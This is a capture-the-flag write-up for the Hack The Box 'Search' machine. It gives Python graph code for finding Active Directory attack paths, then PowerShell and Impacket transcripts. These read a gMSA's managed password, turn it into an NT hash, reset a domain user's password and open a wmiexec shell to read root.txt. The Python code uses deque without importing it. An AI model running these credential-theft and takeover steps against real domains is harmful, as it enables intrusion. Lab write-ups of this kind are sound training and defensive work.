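from typing import Dict, List, Optional, Set, Tuple

Edge = Tuple[str, str, str]  # (source, relationship, target)

# Constructed graph. The first three edges are the chain the writeup reports;
# HOPE.SHARP, EDGAR.JACOBS and DOMAIN USERS are added only to show a principal
# with no path to the gMSA.
EDGES: List[Edge] = [
    ("SIERRA.FRYE@SEARCH.HTB", "MemberOf", "BIRMINGHAM-ITSEC@SEARCH.HTB"),
    ("BIRMINGHAM-ITSEC@SEARCH.HTB", "MemberOf", "ITSECT@SEARCH.HTB"),
    ("ITSECT@SEARCH.HTB", "ReadGMSAPassword", "BIR-ADFS-GMSA@SEARCH.HTB"),
    ("HOPE.SHARP@SEARCH.HTB", "MemberOf", "DOMAIN USERS@SEARCH.HTB"),
    ("EDGAR.JACOBS@SEARCH.HTB", "MemberOf", "DOMAIN USERS@SEARCH.HTB"),
]


def adjacency(edges: List[Edge]):
    """Forward and reverse adjacency lists keyed by node."""
    fwd: Dict[str, List[Tuple[str, str]]] = {}
    rev: Dict[str, List[Tuple[str, str]]] = {}
    for src, rel, dst in edges:
        fwd.setdefault(src, []).append((rel, dst))
        rev.setdefault(dst, []).append((rel, src))
    return fwd, rev


def shortest_path_from_owned(edges: List[Edge], owned: Set[str], target: str) -> Optional[List[str]]:
    """Multi-source BFS from every owned principal at once. Returns the path as
    [node, '-Rel->', node, ...] or None if no owned principal reaches target."""
    fwd, _ = adjacency(edges)
    parent: Dict[str, Optional[Tuple[str, str]]] = {n: None for n in owned}
    queue = deque(owned)
    while queue:
        node = queue.popleft()
        if node == target:
            path = [node]
            while parent[path[-1]] is not None:
                rel, prev = parent[path[-1]]
                path.extend([f"-{rel}->", prev])
            return path[::-1]
        for rel, nxt in fwd.get(node, []):
            if nxt not in parent:          # first visit is the shortest in hops
                parent[nxt] = (rel, node)
                queue.append(nxt)
    return None


def principals_that_can_reach(edges: List[Edge], target: str) -> Set[str]:
    """Reverse BFS: every principal with some path to target. For a gMSA this
    is the real set of identities able to retrieve its password."""
    _, rev = adjacency(edges)
    seen: Set[str] = set()
    queue = deque([target])
    while queue:
        node = queue.popleft()
        for _rel, prev in rev.get(node, []):
            if prev not in seen:
                seen.add(prev)
                queue.append(prev)
    return seen


if __name__ == "__main__":
    owned = {"SIERRA.FRYE@SEARCH.HTB", "HOPE.SHARP@SEARCH.HTB"}
    print(" ".join(shortest_path_from_owned(EDGES, owned, "BIR-ADFS-GMSA@SEARCH.HTB")))
    print(sorted(principals_that_can_reach(EDGES, "BIR-ADFS-GMSA@SEARCH.HTB")))
```

Nested group membership is what makes this easy to miss in an audit: the ACE on the gMSA names only ITSECT, but the reverse search shows Birmingham-itsec and every member of it inherit the right.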
Abusing ReadGMSAPassword:
AD --> ReadGMSAPassword PowerShell
We proceed as follows (ConvertFrom-ADManagedPasswordBlob and ConvertTo-NTHash below come from the DSInternals PowerShell module):
Get-ADServiceAccount
PS C:\Users\Sierra.Frye\Documents> Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties msds-ManagedPassword
DistinguishedName : CN=BIR-ADFS-GMSA,CN=Managed Service Accounts,DC=search,DC=htb
Enabled : True
msds-ManagedPassword : {1, 0, 0, 0...}
Name : BIR-ADFS-GMSA
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 48cd6c5b-56cb-407e-ac2b-7294b5a44857
SamAccountName : BIR-ADFS-GMSA$
SID : S-1-5-21-271492789-1610487937-1871574529-1299
UserPrincipalName :
– Extracting the credential as an NT hash –
PS C:\Users\Sierra.Frye\Documents> $pwd = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties msds-ManagedPassword
PS C:\Users\Sierra.Frye\Documents> $pw = ConvertFrom-ADManagedPasswordBlob $pwd.'msds-managedpassword'
PS C:\Users\Sierra.Frye\Documents> ConvertTo-NTHash $pw.SecureCurrentPassword
e1e9fd9e46d0d747e1595167eedcec0f
– Extracting the credential –
PS C:\Users\Sierra.Frye\Documents> $gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties msDS-ManagedPassword
PS C:\Users\Sierra.Frye\Documents> $mp = $gmsa.'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> ConvertFrom-ADManagedPasswordBlob $mp
Version : 1
CurrentPassword : ꪌ絸禔හॐ뒟娯㔃ᴨ蝓㣹瑹䢓疒웠ᇷꀠ믱츎孻勒壉馮ၸ뛋귊餮꤯ꏗ춰䃳ꘑ畓릝樗껇쁵藫䲈酜⏬궩Œ痧蘸朘嶑侪糼亵韬⓼ↂᡳ춲⼦싸ᖥ裹沑扚羺歖㗻෪ꂓ㚬⮗㞗ꆱ긿쾏㢿쭗캵십ㇾ롤
ᒛ�䬁ማ譿녓鏶骲雰騆惿閴滭䶙竜迉竾ﵸ䲗蔍瞬䦕垞뉧⩱茾蒚⟒澽座걍盡篇
SecureCurrentPassword : System.Security.SecureString
PreviousPassword :
SecurePreviousPassword :
QueryPasswordInterval : 2862.13:38:54.3458092
UnchangedPasswordInterval : 2862.13:33:54.3458092
– Using a ScriptBlock to run a command as the user BIR-ADFS-GMSA –
PS C:\Users\Sierra.Frye\Documents> $pass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
PS C:\Users\Sierra.Frye\Documents> $cred = New-Object System.Management.Automation.PSCredential 'BIR-ADFS-GMSA', $pass
PS C:\Users\Sierra.Frye\Documents> Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock { whoami }
search\bir-adfs-gmsa$
—– Changing the password of the user Tristan Davies —–
PS C:\Users\Sierra.Frye\Documents> Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock { net user tristan.davies Password123$ }
The command completed successfully.
– Connecting once the password has been changed –
# wmiexec.py search.htb/tristan.davies:'Password123$'@10.10.11.129 -shell-type cmd -dc-ip 10.10.11.129
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
search\tristan.davies
C:\Users\Administrator\Desktop>type root.txt
4e22ea74086xxxxxxxxxxxxxxxxxxxxxxxxxx
Machine rooted =), let the OSCP exam tremble